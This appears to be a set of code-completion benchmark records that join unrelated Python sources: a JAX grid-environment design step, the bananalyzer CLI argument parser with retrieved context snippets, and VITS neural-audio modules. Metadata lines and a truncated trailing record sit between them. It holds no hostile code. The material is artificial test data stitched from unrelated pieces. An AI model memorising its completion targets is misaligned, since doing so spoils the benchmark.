noise = jax.random.uniform(rng, (self.params.noise_dim,))
obs.update(dict(noise=noise))
return obs
def reset_env(
self,
key: chex.PRNGKey):
"""
Prepares the environment state for a new design
from a blank slate.
"""
params = self.params
noise_rng, dir_rng = jax.random.split(key)
encoding = jnp.zeros((self._get_encoding_dim(),), dtype=jnp.uint32)
if not params.set_agent_dir:
rand_dir = jax.random.randint(dir_rng, (), minval=0, maxval=4) # deterministic
tile_scale_dir = jnp.ceil((rand_dir/4)*self.n_tiles).astype(jnp.uint32)
encoding = encoding.at[-1].set(tile_scale_dir)
state = EnvState(
encoding=encoding,
time=0,
terminal=False,
)
obs = self._add_noise_to_obs(
noise_rng,
self.get_obs(state)
)
return obs, state
def step_env(
self,
key: chex.PRNGKey,
state: EnvState,
action: int,
) -> Tuple[chex.Array, EnvState, float, bool, dict]:
"""
Take a design step.
action: A pos as an int from 0 to (height*width)-1
"""
params = self.params
collision_rng, noise_rng = jax.random.split(key)
# Sample a random free tile in case of a collision
dist_values = jnp.logical_and( # True if position taken
jnp.ones(params.n_walls + 2),
jnp.arange(params.n_walls + 2)+1 > state.time
)
# Get zero-indexed last wall time step
if params.fixed_n_wall_steps:
max_n_walls = params.n_walls
encoding_pos = state.encoding[:params.n_walls+2]
last_wall_step_idx = max_n_walls - 1
else:
max_n_walls = jnp.round(
params.n_walls*state.encoding[0]/self.n_tiles).astype(jnp.uint32)
if self.params.first_wall_pos_sets_budget:
encoding_pos = state.encoding[:params.n_walls+2]
last_wall_step_idx = jnp.maximum(max_n_walls,1) - 1
else:
encoding_pos = state.encoding[1:params.n_walls+3]
last_wall_step_idx = max_n_walls
pos_dist = jnp.ones(self.n_tiles).at[
jnp.flip(encoding_pos)].set(jnp.flip(dist_values))
all_pos = jnp.arange(self.n_tiles, dtype=jnp.uint32)
# Only mark collision if replace_wall_pos=False OR the agent is placed over the goal
goal_step_idx = last_wall_step_idx + 1
agent_step_idx = last_wall_step_idx + 2
# Track whether it is the last time step
next_state = state.replace(time=state.time + 1)
done = self.is_terminal(next_state)
# Always place agent idx in last enc position.
is_agent_dir_step = jnp.logical_and(
params.set_agent_dir,
done
)
collision = jnp.logical_and(
pos_dist[action] < 1,
jnp.logical_or(
not params.replace_wall_pos,
jnp.logical_and( # agent pos cannot override goal
jnp.equal(state.time, agent_step_idx),
jnp.equal(state.encoding[goal_step_idx], action)
)
)
)
collision = (collision * (1-is_agent_dir_step)).astype(jnp.uint32)
action = (1-collision)*action + \
collision*jax.random.choice(collision_rng, all_pos, replace=False, p=pos_dist)
enc_idx = (1-is_agent_dir_step)*state.time + is_agent_dir_step*(-1)
encoding = state.encoding.at[enc_idx].set(action)
next_state = next_state.replace(
encoding=encoding,
terminal=done
)
reward = 0
obs = self._add_noise_to_obs(noise_rng, self.get_obs(next_state))
return (
lax.stop_gradient(obs),
lax.stop_gradient(next_state),
reward,
done,
{},
)
def get_env_instance(
self,
key: chex.PRNGKey,
state: EnvState
) -> chex.Array:
"""
Converts internal encoding to an instance encoding that
can be interpreted by the `set_to_instance` method
the paired Environment class.
"""
params = self.params
h = params.height
w = params.width
enc = state.encoding
# === Extract agent_dir, agent_pos, and goal_pos ===
# Num walls placed currently
if params.fixed_n_wall_steps:
n_walls = params.n_walls
enc_len = self._get_encoding_dim()
wall_pos_idx = jnp.flip(enc[:params.n_walls])
agent_pos_idx = enc_len-2 # Enc is full length
goal_pos_idx = enc_len-3
else:
n_walls = jnp.round(
params.n_walls*enc[0]/self.n_tiles
).astype(jnp.uint32)
if params.first_wall_pos_sets_budget:
wall_pos_idx = jnp.flip(enc[:params.n_walls]) # So 0-padding does not override pos=0
enc_len = n_walls + 2 # [wall_pos] + len((goal, agent))
else:
wall_pos_idx = jnp.flip(enc[1:params.n_walls+1])
enc_len = n_walls + 3 # [wall_pos] + len((n_walls, goal, agent))
agent_pos_idx = enc_len-1 # Positions are relative to n_walls when n_walls is variable.
goal_pos_idx = enc_len-2
# Get agent + goal info (set agent/goal pos 1-step out of range if they are not yet placed)
goal_placed = state.time > jnp.array([goal_pos_idx], dtype=jnp.uint32)
goal_pos = \
goal_placed*jnp.array([enc[goal_pos_idx]%w, enc[goal_pos_idx]//w], dtype=jnp.uint32) \
+ (~goal_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_placed = state.time > jnp.array([agent_pos_idx], dtype=jnp.uint32)
agent_pos = \
agent_placed*jnp.array([enc[agent_pos_idx]%w, enc[agent_pos_idx]//w], dtype=jnp.uint32) \
+ (~agent_placed)*jnp.array([w,h], dtype=jnp.uint32)
agent_dir_idx = jnp.floor((4*enc[-1]/self.n_tiles)).astype(jnp.uint8)
# Make wall map
wall_start_time = jnp.logical_and( # 1 if explicitly predict # blocks, else 0
not params.fixed_n_wall_steps,
not params.first_wall_pos_sets_budget
).astype(jnp.uint32)
wall_map = jnp.zeros(h*w, dtype=jnp.bool_)
wall_values = jnp.arange(params.n_walls) + wall_start_time < jnp.minimum(state.time, n_walls + wall_start_time)
wall_values = jnp.flip(wall_values)
wall_map = wall_map.at[wall_pos_idx].set(wall_values)
# Zero out walls where agent and goal reside
agent_mask = agent_placed*(~(jnp.arange(h*w) == state.encoding[agent_pos_idx])) + ~agent_placed*wall_map
goal_mask = goal_placed*(~(jnp.arange(h*w) == state.encoding[goal_pos_idx])) + ~goal_placed*wall_map
wall_map = wall_map*agent_mask*goal_mask
wall_map = wall_map.reshape(h,w)
| return EnvInstance( | 0 | 2023-10-28 12:12:01+00:00 | 4k |
reworkd/bananalyzer | bananalyzer/__main__.py | [
{
"identifier": "AgentRunner",
"path": "bananalyzer/runner/agent_runner.py",
"snippet": "class AgentRunner(ABC):\n \"\"\"\n Wrapper class clients must implement to run an agent against the evaluations\n \"\"\"\n\n @abstractmethod\n async def run(\n self,\n page: Page,\n eval_context: Example,\n ) -> AgentResult:\n pass"
},
{
"identifier": "get_test_examples",
"path": "bananalyzer/data/examples.py",
"snippet": "def get_test_examples() -> List[Example]:\n return load_examples_at_path(get_examples_path(), test_examples_name)"
},
{
"identifier": "get_training_examples",
"path": "bananalyzer/data/examples.py",
"snippet": "def get_training_examples() -> List[Example]:\n return load_examples_at_path(get_examples_path(), train_examples_name)"
},
{
"identifier": "download_examples",
"path": "bananalyzer/data/examples.py",
"snippet": "def download_examples() -> None:\n \"\"\"\n Downloads the repo via git and places contents of the `/static` data directory in ~/.bananalyzer_data\n \"\"\"\n repo_url = \"https://github.com/reworkd/bananalyzer.git\"\n branch = \"main\"\n data_folder_name = \"static/\"\n\n try:\n subprocess.run(\n [\"git\", \"clone\", \"-b\", branch, repo_url, \"repo_temp\"], check=True\n )\n\n data_folder_path = Path(\"repo_temp\") / data_folder_name\n if not data_folder_path.exists():\n raise FileNotFoundError(\n f\"The folder '{data_folder_name}' does not exist in the repository.\"\n )\n\n downloaded_examples_path.mkdir(parents=True, exist_ok=True)\n for item in downloaded_examples_path.iterdir():\n if item.is_dir():\n shutil.rmtree(item)\n else:\n item.unlink()\n\n for item in data_folder_path.iterdir():\n target_path = shutil.move(str(item), downloaded_examples_path)\n for root, dirs, files in os.walk(target_path):\n for file in files:\n convert_to_crlf(Path(root) / file)\n\n finally:\n print(\"Cleaning up repo...\")\n shutil.rmtree(\"repo_temp\", ignore_errors=True)"
},
{
"identifier": "PytestTestGenerator",
"path": "bananalyzer/runner/generator.py",
"snippet": "class PytestTestGenerator:\n def __init__(self) -> None:\n self._classnames: Dict[str, int] = {}\n\n def generate_test(self, example: Example) -> BananalyzerTest:\n return BananalyzerTest(\n code=f\"\"\"\[email protected]\nclass {self._generate_class_name(example)}:\n\n @classmethod\n def setup_class(cls):\n cls.example = get_example_by_url(\"{example.url}\")\n\n\n @pytest_asyncio.fixture(scope=\"class\")\n async def result(self, page, agent):\n yield await agent.run(page, self.example)\n\n {\"\".join(self._generate_eval_test(eval_, i, {\n \"category\": example.category,\n \"subcategory\": example.subcategory,\n \"type\": example.type,\n }) for i, eval_ in enumerate(example.evals))}\n\"\"\",\n example=example,\n )\n\n @staticmethod\n def _generate_eval_test(eval_: Eval, i: int, attrs: dict[str, str]) -> str:\n marks = \"\\n \".join(\n f\"@pytest.mark.{MARKER_PREFIX}{k}('{v}')\" for k, v in attrs.items()\n )\n\n if eval_.type == \"json_match\" and isinstance(eval_.expected, dict):\n return f\"\"\"\n {marks}\n @pytest.mark.parametrize(\"key\", {list(eval_.expected.keys())})\n async def test_match_field(self, key, result) -> None:\n self.example.evals[{i}].eval_results(None, result, field=key)\n\n\"\"\"\n return f\"\"\"\n {marks}\n async def test_{eval_.type}(self, page, result) -> None:\n self.example.evals[{i}].eval_results(page, result)\n\n\"\"\"\n\n def _generate_class_name(self, example: Example) -> str:\n domain = urlparse(example.url).netloc\n domain = domain.replace(\".\", \"_\")\n domain = domain.replace(\"-\", \"_\")\n if domain.startswith(\"www_\"):\n domain = domain[4:]\n\n domain = \"\".join([part.capitalize() for part in domain.split(\"_\")])\n\n key = f\"{example.type.capitalize()}{domain}\"\n self._classnames[key] = self._classnames.get(key, -1) + 1\n suffix = \"\" if not self._classnames[key] else f\"{self._classnames[key] + 1}\"\n return f\"Test{key}{suffix}_{example.id.replace('-', '_')}\""
},
{
"identifier": "run_tests",
"path": "bananalyzer/runner/runner.py",
"snippet": "def run_tests(\n tests: List[BananalyzerTest],\n runner: AgentRunnerClass,\n pytest_args: PytestArgs,\n xdist_args: XDistArgs,\n headless: bool = False,\n single_browser_instance: bool = False,\n) -> int:\n \"\"\"\n Create temporary test files based on intent, run them, and then delete them\n \"\"\"\n intents = {test.example.type for test in tests}\n intent_separated_tests = [\n [test for test in tests if test.example.type == intent] for intent in intents\n ]\n\n cache_dir = Path(os.getcwd()) / \".banana_cache\"\n cache_dir.mkdir(exist_ok=True)\n with open(cache_dir / \".gitignore\", \"w\") as f:\n f.write(\"# Generated by bananalyzer automatically\\n*\")\n\n with tempfile.TemporaryDirectory(dir=cache_dir) as temp_dir:\n temp_path = Path(temp_dir)\n\n test_file_names = [\n create_test_file(\n tests,\n f\"{tests[0].example.type}_intent_\",\n temp_path,\n runner,\n headless,\n single_browser_instance,\n )\n for tests in intent_separated_tests\n ]\n\n args = (\n test_file_names\n + [\"-s\"] * pytest_args.s\n + ([\"-q\"] if pytest_args.q else [\"-vvv\"])\n + [\"-n\", str(xdist_args.n)]\n + [\"--dist\", xdist_args.dist]\n + [f\"--junitxml={pytest_args.xml}\"] * bool(pytest_args.xml)\n + [\"--disable-warnings\"]\n )\n\n kwargs = dict()\n if not xdist_args.n:\n kwargs[\"plugins\"] = [BananalyzerPytestPlugin()]\n else:\n hooks = Path(__file__).parent.parent / \"hooks.py\"\n shutil.copy(hooks, temp_path / \"conftest.py\")\n\n exit_code = pytest.main(args, **kwargs)\n if pytest_args.xml:\n enrich_report(pytest_args.xml)\n\n return exit_code"
},
{
"identifier": "AgentRunnerClass",
"path": "bananalyzer/schema.py",
"snippet": "class AgentRunnerClass(BaseModel):\n class_name: str\n class_path: str"
},
{
"identifier": "Args",
"path": "bananalyzer/schema.py",
"snippet": "class Args(BaseModel):\n path: Union[str, Literal[\"DOWNLOAD_ONLY\"]]\n headless: bool\n single_browser_instance: bool\n id: Optional[str] = Field(default=None)\n domain: Optional[str] = Field(default=None)\n intent: Optional[GoalType] = Field(default=None)\n category: Optional[str] = Field(default=None)\n subcategory: Optional[str] = Field(default=None)\n skip: List[str]\n type: Optional[str] = Field(default=None)\n download: bool\n test: bool\n count: Optional[int]\n pytest_args: PytestArgs\n xdist_args: XDistArgs"
},
{
"identifier": "PytestArgs",
"path": "bananalyzer/schema.py",
"snippet": "class PytestArgs(BaseModel):\n s: bool\n q: bool\n xml: Optional[str] = Field(description=\"Path to the xml report file\")"
},
{
"identifier": "XDistArgs",
"path": "bananalyzer/schema.py",
"snippet": "class XDistArgs(BaseModel):\n dist: XDistDistributionMode = Field(description=\"Distribution mode (xdist)\")\n n: Union[int, Literal[\"logical\", \"auto\"]] = Field(\n description=\"Number of workers (xdist)\"\n )"
}
] | import argparse
import ast
import importlib.util
import sys
from pathlib import Path
from typing import List
from urllib.parse import urlparse
from bananalyzer import AgentRunner
from bananalyzer.data.examples import (
get_test_examples,
get_training_examples,
download_examples,
)
from bananalyzer.runner.generator import PytestTestGenerator
from bananalyzer.runner.runner import run_tests
from bananalyzer.schema import AgentRunnerClass, Args, PytestArgs, XDistArgs | 3,082 | "--id",
type=str,
default=None,
help="Filter tests by id. "
"Ids could be of shape a4c8292a_079c_4e49_bca1_cf7c9da205ec or a4c8292a-079c-4e49-bca1-cf7c9da205ec",
)
parser.add_argument(
"-d",
"--domain",
type=str,
default=None,
help="Filter tests by a particular URL domain",
)
parser.add_argument(
"-i",
"--intent",
type=str,
default=None,
help="Filter tests by a particular intent",
)
parser.add_argument(
"-c",
"--category",
type=str,
default=None,
help="Filter tests by a particular category",
)
parser.add_argument(
"--subcategory",
type=str,
default=None,
help="Filter tests by a particular subcategory",
)
parser.add_argument(
"-n",
"--n",
type=str,
default="logical",
help="Number of test workers to use. The default is 1",
)
parser.add_argument(
"-skip",
"--skip",
type=lambda s: s.split(","),
default=[],
help="A list of ids to skip tests on, separated by commas",
)
parser.add_argument(
"-q",
"--quiet",
action="store_true",
help="Will decrease the verbosity of pytest. By default we run with the `--v` pytest param.",
)
parser.add_argument(
"--single_browser_instance",
action="store_true",
help="Run tests in a single browser instance as opposed to creating a browser "
"instance per test. This is faster but less reliable as test contexts can "
"occasionally bleed into each other, causing tests to fail",
)
parser.add_argument(
"--type",
type=str,
default=None,
help="Filter tests by a particular type",
)
parser.add_argument(
"--download",
action="store_true",
help="Will re-download training and test examples",
)
parser.add_argument(
"--test",
action="store_true",
help="Use test set examples instead of training set examples",
)
parser.add_argument(
"--count",
type=int,
default=None,
help="The number of times to run an individual test. Won't work for detail pages",
)
parser.add_argument(
"--junitxml",
type=str,
default=None,
help="The path for the junitxml report file",
)
parser.add_argument(
"--dist",
type=str,
default="loadscope",
help="The distribution mode for pytest-xdist",
)
args = parser.parse_args()
if args.download and not args.path:
args.path = "DOWNLOAD_ONLY"
if not args.path:
print(
f"Please provide the path to a {file_name} file. "
f"Use the --help flag for more information."
)
exit(1)
return Args(
path=args.path,
headless=args.headless,
intent=args.intent,
id=args.id,
domain=args.domain,
category=args.category,
subcategory=args.subcategory,
skip=args.skip,
single_browser_instance=args.single_browser_instance,
type=args.type,
test=args.test,
download=args.download,
count=args.count,
| # Separate banana-lyzer args from pytest args
# Look for an instance of Banana-lyzer in the current directory
# If it doesn't exist, error
def print_intro() -> None:
# https://www.asciiart.eu/food-and-drinks/bananas
print(
r"""
//\
V \
\ \_
\,'.`-.
|\ `. `.
( \ `. `-. _,.-:\
\ \ `. `-._ __..--' ,-';/
\ `. `-. `-..___..---' _.--' ,'/
`. `. `-._ __..--' ,' /
`. `-_ ``--..'' _.-' ,'
`-_ `-.___ __,--' ,'
`-.__ `----''' __.-'
`--..____..--'
"""
)
print("Bananalyzing... 🍌")
def parse_args() -> Args:
file_name = "bananalyzer-agent.py"
parser = argparse.ArgumentParser(
description="Run the agent inside a bananalyzer agent definition file "
"against the benchmark",
)
parser.add_argument(
"path", type=str, nargs="?", default=None, help=f"Path to the {file_name} file"
)
parser.add_argument(
"--headless", action="store_true", help="Whether to run headless or not"
)
parser.add_argument(
"-s",
"--s",
action="store_true",
help="Shortcut for --capture=no in pytest. Will print stdout and stderr",
)
parser.add_argument(
"-id",
"--id",
type=str,
default=None,
help="Filter tests by id. "
"Ids could be of shape a4c8292a_079c_4e49_bca1_cf7c9da205ec or a4c8292a-079c-4e49-bca1-cf7c9da205ec",
)
parser.add_argument(
"-d",
"--domain",
type=str,
default=None,
help="Filter tests by a particular URL domain",
)
parser.add_argument(
"-i",
"--intent",
type=str,
default=None,
help="Filter tests by a particular intent",
)
parser.add_argument(
"-c",
"--category",
type=str,
default=None,
help="Filter tests by a particular category",
)
parser.add_argument(
"--subcategory",
type=str,
default=None,
help="Filter tests by a particular subcategory",
)
parser.add_argument(
"-n",
"--n",
type=str,
default="logical",
help="Number of test workers to use. The default is 1",
)
parser.add_argument(
"-skip",
"--skip",
type=lambda s: s.split(","),
default=[],
help="A list of ids to skip tests on, separated by commas",
)
parser.add_argument(
"-q",
"--quiet",
action="store_true",
help="Will decrease the verbosity of pytest. By default we run with the `--v` pytest param.",
)
parser.add_argument(
"--single_browser_instance",
action="store_true",
help="Run tests in a single browser instance as opposed to creating a browser "
"instance per test. This is faster but less reliable as test contexts can "
"occasionally bleed into each other, causing tests to fail",
)
parser.add_argument(
"--type",
type=str,
default=None,
help="Filter tests by a particular type",
)
parser.add_argument(
"--download",
action="store_true",
help="Will re-download training and test examples",
)
parser.add_argument(
"--test",
action="store_true",
help="Use test set examples instead of training set examples",
)
parser.add_argument(
"--count",
type=int,
default=None,
help="The number of times to run an individual test. Won't work for detail pages",
)
parser.add_argument(
"--junitxml",
type=str,
default=None,
help="The path for the junitxml report file",
)
parser.add_argument(
"--dist",
type=str,
default="loadscope",
help="The distribution mode for pytest-xdist",
)
args = parser.parse_args()
if args.download and not args.path:
args.path = "DOWNLOAD_ONLY"
if not args.path:
print(
f"Please provide the path to a {file_name} file. "
f"Use the --help flag for more information."
)
exit(1)
return Args(
path=args.path,
headless=args.headless,
intent=args.intent,
id=args.id,
domain=args.domain,
category=args.category,
subcategory=args.subcategory,
skip=args.skip,
single_browser_instance=args.single_browser_instance,
type=args.type,
test=args.test,
download=args.download,
count=args.count, | pytest_args=PytestArgs( | 8 | 2023-10-30 16:40:57+00:00 | 4k |
innnky/ar-vits | module/modules.py | [
{
"identifier": "commons",
"path": "module/commons.py",
"snippet": "def init_weights(m, mean=0.0, std=0.01):\ndef get_padding(kernel_size, dilation=1):\ndef convert_pad_shape(pad_shape):\ndef intersperse(lst, item):\ndef kl_divergence(m_p, logs_p, m_q, logs_q):\ndef rand_gumbel(shape):\ndef rand_gumbel_like(x):\ndef slice_segments(x, ids_str, segment_size=4):\ndef rand_slice_segments(x, x_lengths=None, segment_size=4):\ndef get_timing_signal_1d(\n length, channels, min_timescale=1.0, max_timescale=1.0e4):\ndef add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4):\ndef cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1):\ndef subsequent_mask(length):\ndef fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels):\ndef convert_pad_shape(pad_shape):\ndef shift_1d(x):\ndef sequence_mask(length, max_length=None):\ndef generate_path(duration, mask):\ndef clip_grad_value_(parameters, clip_value, norm_type=2):\ndef squeeze(x, x_mask=None, n_sqz=2):\ndef unsqueeze(x, x_mask=None, n_sqz=2):"
},
{
"identifier": "init_weights",
"path": "module/commons.py",
"snippet": "def init_weights(m, mean=0.0, std=0.01):\n classname = m.__class__.__name__\n if classname.find(\"Conv\") != -1:\n m.weight.data.normal_(mean, std)"
},
{
"identifier": "get_padding",
"path": "module/commons.py",
"snippet": "def get_padding(kernel_size, dilation=1):\n return int((kernel_size*dilation - dilation)/2)"
},
{
"identifier": "piecewise_rational_quadratic_transform",
"path": "module/transforms.py",
"snippet": "def piecewise_rational_quadratic_transform(inputs, \n unnormalized_widths,\n unnormalized_heights,\n unnormalized_derivatives,\n inverse=False,\n tails=None, \n tail_bound=1.,\n min_bin_width=DEFAULT_MIN_BIN_WIDTH,\n min_bin_height=DEFAULT_MIN_BIN_HEIGHT,\n min_derivative=DEFAULT_MIN_DERIVATIVE):\n\n if tails is None:\n spline_fn = rational_quadratic_spline\n spline_kwargs = {}\n else:\n spline_fn = unconstrained_rational_quadratic_spline\n spline_kwargs = {\n 'tails': tails,\n 'tail_bound': tail_bound\n }\n\n outputs, logabsdet = spline_fn(\n inputs=inputs,\n unnormalized_widths=unnormalized_widths,\n unnormalized_heights=unnormalized_heights,\n unnormalized_derivatives=unnormalized_derivatives,\n inverse=inverse,\n min_bin_width=min_bin_width,\n min_bin_height=min_bin_height,\n min_derivative=min_derivative,\n **spline_kwargs\n )\n return outputs, logabsdet"
}
] | import math
import numpy as np
import torch
import torch.distributions as D
from torch import nn
from torch.nn import functional as F
from torch.nn import Conv1d
from torch.nn.utils import weight_norm, remove_weight_norm
from module import commons
from module.commons import init_weights, get_padding
from module.transforms import piecewise_rational_quadratic_transform | 2,402 | self.n_layers = n_layers
self.p_dropout = p_dropout
self.drop = nn.Dropout(p_dropout)
self.convs_sep = nn.ModuleList()
self.convs_1x1 = nn.ModuleList()
self.norms_1 = nn.ModuleList()
self.norms_2 = nn.ModuleList()
for i in range(n_layers):
dilation = kernel_size ** i
padding = (kernel_size * dilation - dilation) // 2
self.convs_sep.append(nn.Conv1d(channels, channels, kernel_size,
groups=channels, dilation=dilation, padding=padding
))
self.convs_1x1.append(nn.Conv1d(channels, channels, 1))
self.norms_1.append(LayerNorm(channels))
self.norms_2.append(LayerNorm(channels))
def forward(self, x, x_mask, g=None):
if g is not None:
x = x + g
for i in range(self.n_layers):
y = self.convs_sep[i](x * x_mask)
y = self.norms_1[i](y)
y = F.gelu(y)
y = self.convs_1x1[i](y)
y = self.norms_2[i](y)
y = F.gelu(y)
y = self.drop(y)
x = x + y
return x * x_mask
class WN(torch.nn.Module):
def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0):
super(WN, self).__init__()
assert(kernel_size % 2 == 1)
self.hidden_channels =hidden_channels
self.kernel_size = kernel_size,
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(gin_channels, 2*hidden_channels*n_layers, 1)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight')
for i in range(n_layers):
dilation = dilation_rate ** i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(hidden_channels, 2*hidden_channels, kernel_size,
dilation=dilation, padding=padding)
in_layer = torch.nn.utils.weight_norm(in_layer, name='weight')
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight')
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:,cond_offset:cond_offset+2*self.hidden_channels,:]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(
x_in,
g_l,
n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:,:self.hidden_channels,:]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:,self.hidden_channels:,:]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList([
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2])))
])
|
LRELU_SLOPE = 0.1
class LayerNorm(nn.Module):
def __init__(self, channels, eps=1e-5):
super().__init__()
self.channels = channels
self.eps = eps
self.gamma = nn.Parameter(torch.ones(channels))
self.beta = nn.Parameter(torch.zeros(channels))
def forward(self, x):
x = x.transpose(1, -1)
x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps)
return x.transpose(1, -1)
class ConvReluNorm(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, kernel_size, n_layers, p_dropout):
super().__init__()
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
assert n_layers > 1, "Number of layers should be larger than 0."
self.conv_layers = nn.ModuleList()
self.norm_layers = nn.ModuleList()
self.conv_layers.append(nn.Conv1d(in_channels, hidden_channels, kernel_size, padding=kernel_size//2))
self.norm_layers.append(LayerNorm(hidden_channels))
self.relu_drop = nn.Sequential(
nn.ReLU(),
nn.Dropout(p_dropout))
for _ in range(n_layers-1):
self.conv_layers.append(nn.Conv1d(hidden_channels, hidden_channels, kernel_size, padding=kernel_size//2))
self.norm_layers.append(LayerNorm(hidden_channels))
self.proj = nn.Conv1d(hidden_channels, out_channels, 1)
self.proj.weight.data.zero_()
self.proj.bias.data.zero_()
def forward(self, x, x_mask):
x_org = x
for i in range(self.n_layers):
x = self.conv_layers[i](x * x_mask)
x = self.norm_layers[i](x)
x = self.relu_drop(x)
x = x_org + self.proj(x)
return x * x_mask
class DDSConv(nn.Module):
"""
Dialted and Depth-Separable Convolution
"""
def __init__(self, channels, kernel_size, n_layers, p_dropout=0.):
super().__init__()
self.channels = channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
self.drop = nn.Dropout(p_dropout)
self.convs_sep = nn.ModuleList()
self.convs_1x1 = nn.ModuleList()
self.norms_1 = nn.ModuleList()
self.norms_2 = nn.ModuleList()
for i in range(n_layers):
dilation = kernel_size ** i
padding = (kernel_size * dilation - dilation) // 2
self.convs_sep.append(nn.Conv1d(channels, channels, kernel_size,
groups=channels, dilation=dilation, padding=padding
))
self.convs_1x1.append(nn.Conv1d(channels, channels, 1))
self.norms_1.append(LayerNorm(channels))
self.norms_2.append(LayerNorm(channels))
def forward(self, x, x_mask, g=None):
if g is not None:
x = x + g
for i in range(self.n_layers):
y = self.convs_sep[i](x * x_mask)
y = self.norms_1[i](y)
y = F.gelu(y)
y = self.convs_1x1[i](y)
y = self.norms_2[i](y)
y = F.gelu(y)
y = self.drop(y)
x = x + y
return x * x_mask
class WN(torch.nn.Module):
def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0):
super(WN, self).__init__()
assert(kernel_size % 2 == 1)
self.hidden_channels =hidden_channels
self.kernel_size = kernel_size,
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(gin_channels, 2*hidden_channels*n_layers, 1)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight')
for i in range(n_layers):
dilation = dilation_rate ** i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(hidden_channels, 2*hidden_channels, kernel_size,
dilation=dilation, padding=padding)
in_layer = torch.nn.utils.weight_norm(in_layer, name='weight')
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight')
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:,cond_offset:cond_offset+2*self.hidden_channels,:]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(
x_in,
g_l,
n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:,:self.hidden_channels,:]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:,self.hidden_channels:,:]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList([
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2])))
]) | self.convs1.apply(init_weights) | 1 | 2023-10-30 04:40:19+00:00 | 4k |
OpenMask3D/openmask3d | openmask3d/mask_features_computation/features_extractor.py | [
{
"identifier": "Camera",
"path": "openmask3d/data/load.py",
